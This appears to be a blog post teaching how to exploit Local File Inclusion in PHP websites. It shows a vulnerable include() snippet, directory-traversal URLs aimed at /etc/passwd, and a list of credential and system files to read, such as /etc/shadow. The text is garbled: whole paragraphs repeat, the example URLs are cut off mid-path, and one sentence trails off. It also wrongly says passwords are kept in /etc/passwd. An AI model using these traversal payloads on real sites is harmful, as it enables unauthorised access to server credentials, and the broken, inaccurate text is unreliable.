Local File inclusion is a common website hacking trick. This tutorial will show you how to exploit a website using L.F.I.
First of all, take a look on the given php code.
<?php
$page=$_GET[page];
include($page);
?>
The above given code is generally used in many website by web developers which should not
be use because the $page isn't sanitized and is passed directly to the webpage. This code is used by hackers for L.F.I.
In general, you have seen many URL's like thishttp://www.site.com/index.php?page=products.php
the value passed through the query string is used to include products.php page by the above given php code without checking the proper format of value inserted at URL.
suppose we inserted the URL like this..http://www.site.com/index.php?page=mypage.php
this mypage.php does not exists on the server so it will show a php error message on the webpage..Warning: include() [function.include]: Failed opening 'mypage.php' for inclusion.........
the value passed through the query string is used to include products.php page by the above given php code without checking the proper format of value inserted at URL.
suppose we inserted the URL like this..http://www.site.com/index.php?page=mypage.php
this mypage.php does not exists on the server so it will show a php error message on the webpage..Warning: include() [function.include]: Failed opening 'mypage.php' for inclusion.........
here we go..
we know this is vulnerable.
we know this is vulnerable.
If this website is hosted on a unix server, then we might be able to do a directory transversal to the password file.
The etc/passwd is where the users/passwords are storedhttp://www.mywebsite.com/index.php?page=../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
try adding ../ till you get access to the passwd file..
here note one thing.
if the URL is like this.
You can also view
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
these files will also give you some useful informations of the server system.
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
try adding ../ till you get access to the passwd file..
here note one thing.
if the URL is like this.
You can also view
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
these files will also give you some useful informations of the server system.
No comments:
Post a Comment